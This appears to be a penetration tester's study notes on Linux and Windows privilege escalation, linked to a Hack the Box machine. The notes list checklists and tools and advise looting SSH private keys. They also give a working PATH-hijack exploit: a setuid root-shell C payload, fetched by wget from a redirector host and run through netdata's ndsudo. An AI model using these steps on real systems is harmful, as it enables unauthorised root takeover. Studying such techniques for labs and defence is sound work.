Privilege Escalation

# **Basic Information** # **Linux** - `sudo -l` - [GTFOBins](https://gtfobins.github.io/) - `bash_history` - Password reuse - Look for SSH keys - `/home/<user>/.ssh/id_rsa` - `/root/.ssh/id_rsa` - Also check for `id_dsa`, `id_ecdsa`, `id_ed25519`, `identity` - `chmod 600 id_rsa` then connect with `ssh root@<target_ip> -i id_rsa` ## **Checklists** - [HackTricks Linux Checklist](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html) - [PayloadAllTheThings Linux Checklist](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) ## **Scripts** - [LinEnum](https://github.com/rebootuser/LinEnum) - [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker) ## **Kernel Exploits** - CVE-2016-5195 ([DirtyCow](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs)) ## **Exploiting the `PATH` Environment Variable** Exploiting the `PATH` environment variable for local privilege escalation (LPE) is a technique used on Linux systems when a privileged program calls an unprivileged program without specifying its full, absolute path. An attacker can manipulate the `PATH` variable to execute a malicious version of the program instead of the legitimate one, gaining elevated privileges. ```bash # ran on the op station cat > payload.c << EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/bash", "bash", NULL); return 0; } EOF gcc -static payload.c -o www/nvme -Wall -Werror -Wpedantic ``` ```bash # ran on target wget http://<redir_ip>/nvme -O /tmp/nvme chmod +x /tmp/nvme PATH=/tmp:$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list ``` # **Windows** - [LOLBAS](https://lolbas-project.github.io/#) - `PSReadLine` - Password reuse ## **Checklists** - [HackTricks Windows Checklist](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html) - [PayloadAllTheThings Windows Checklist](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) ## **Scripts** - [Seatbelt](https://github.com/GhostPack/Seatbelt) - [JAWS](https://github.com/411Hall/JAWS) # **References** # **Practical Application** | Platform | Name | Notes | | ------------ | ---------- | ----- | | Hack the Box | [[Editor]] | |